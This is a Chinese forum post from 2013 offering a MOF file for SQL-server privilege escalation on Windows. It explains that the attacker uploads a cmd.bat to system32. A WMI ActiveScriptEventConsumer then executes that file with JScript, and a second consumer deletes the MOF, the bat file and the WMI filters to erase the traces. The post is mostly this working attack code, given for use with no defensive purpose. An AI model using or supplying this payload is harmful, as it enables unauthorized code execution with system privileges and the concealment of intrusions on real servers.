|
这个sql提权MOF需要运行 system下的文件,不能定义路径。 需要将要运行的命令写入到bat上传到system32目录,然后执行。
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。 #pragma namespace("\\\\.\\root\\cimv2") class MyClass547 { [key] string Name; }; class ActiveScriptEventConsumer : __EventConsumer { [key] string Name; [not_null] string ScriptingEngine; string ScriptFileName; [template] string ScriptText; uint32 KillTimeout; }; instance of __Win32Provider as $P { Name = "ActiveScriptEventConsumer"; CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}"; PerUserInitialization = TRUE; }; instance of __EventConsumerProviderRegistration { Provider = $P; ConsumerClassNames = {"ActiveScriptEventConsumer"}; }; Instance of ActiveScriptEventConsumer as $cons { Name = "ASEC"; ScriptingEngine = "JScript"; ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; }; Instance of ActiveScriptEventConsumer as $cons2 { Name = "qndASEC"; ScriptingEngine = "JScript"; ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};"; }; instance of __EventFilter as $Filt { Name = "instfilt"; Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage = "WQL"; }; instance of __EventFilter as $Filt2 { Name = "qndfilt"; Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage = "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer = $cons; Filter = $Filt; }; instance of __FilterToConsumerBinding as $bind2 { Consumer = $cons2; Filter = $Filt2; }; instance of MyClass547 as $MyClass { Name = "ClassConsumer"; };
| 
窥视卡
雷达卡
发表于 2013-2-12 10:47:20
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2013-2-15 12:27:09